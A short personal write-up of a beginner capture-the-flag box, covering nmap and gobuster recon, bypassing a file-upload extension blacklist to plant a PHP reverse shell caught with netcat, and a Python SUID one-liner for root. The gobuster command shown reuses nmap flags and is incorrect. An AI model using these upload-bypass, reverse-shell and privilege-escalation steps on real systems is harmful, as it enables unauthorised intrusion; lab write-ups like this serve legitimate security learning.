RootMe A ctf for beginners, can you root me?

This was a simple and not very exciting challenge but I solved it pretty quickly using techniques I didn't know about a month or two ago so I think I'm slowly making progress.

Recon

We as per usual we execute a nmap scan against the target IP:

$: nmap -A -p- $target

We see that there an Apache server running and the version number is also given in the output.

We can also go to target IP in a web browser and look around but there's nothing interesting there but it's good practice.

Can we find any other directories served by the web server?

Run:

$: gobuster -A -p- $target

To find the following two interesting directories; /panel which is a file uploader and /uploads where the uploaded files ends up. Upload a picture of a cute cat to verify that it works.

Do the uploader impose any restrictions on the files? An educated guess is that the web server is running PHP in the backend so let's try to upload a PHP reverse shell as is. Indeed, this is not allowed.

Bypassing filtering and getting a shell

This was the only part of the challenge that wasn't completely obvious to me. Had I just followed the road map presented in earlier rooms, e.g. Upload Vulnerabilities, where you go from simple methods to successively more complex methods I would have got this in no time instead I fucked up and wasted time by trying irrelevant stuff.

The server uses server-side term extension blacklisting. Under the assumption that we are dealing with a LAMP-ish server we try to upload the PHP reverse shell using the filename extensions listed on the PHP Wikipedia page. This will eventually shows that the admin was stoned while setting this up and forgot to add one extension to the blacklist.

Once we manage to bypass the server-side filtering and upload our PHP reverse shell start listening:

$: nc -lvp 1234

go to /uploads in a web browser and click on the uploaded shell.

The user flag is easy to find.

Privesc

Alright, we have a shell. Now we want to become root. We can upload and run LinEnum to find ways to obtain privilege escalation but since this is suppose to be an easy challenge it suffices to do a search with find for programs with SETUID permissions:

$: find / -user root -perm /4000

A certain nice snake looks out of place in the output. Can we use it to become root?

Of course! GTFOBins to the rescue! In the Python SUID section we find that by by executing:

$: python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

now

$: whoami
root

we are done here.

Conclusion

Again overthinking simple stuff. This seems to be a theme with me and ctfs. I need to step back and think things through before starting the attack.

These challenges are a lot more fun when you can get away with avoiding Burp Suite and Metasploit.

I still feel like a (very old) script kiddie but on the other hand say that I forgot a SSH password to an important server but I know that it's possible to brute force the password, why would I create my own, probably inferior, tool for this rather than using Hydra? I'm not sure where the line is drawn. At least I try to understand what I'm doing, maybe that counts for something.

I'm still having a lot of fun solving these challenges and I'm slowly making some progress. When I started out I wouldn't have been able to solve this. The challenge in itself is not much to write home about but nevertheless it's good to see that I'm able to solve it without much trouble.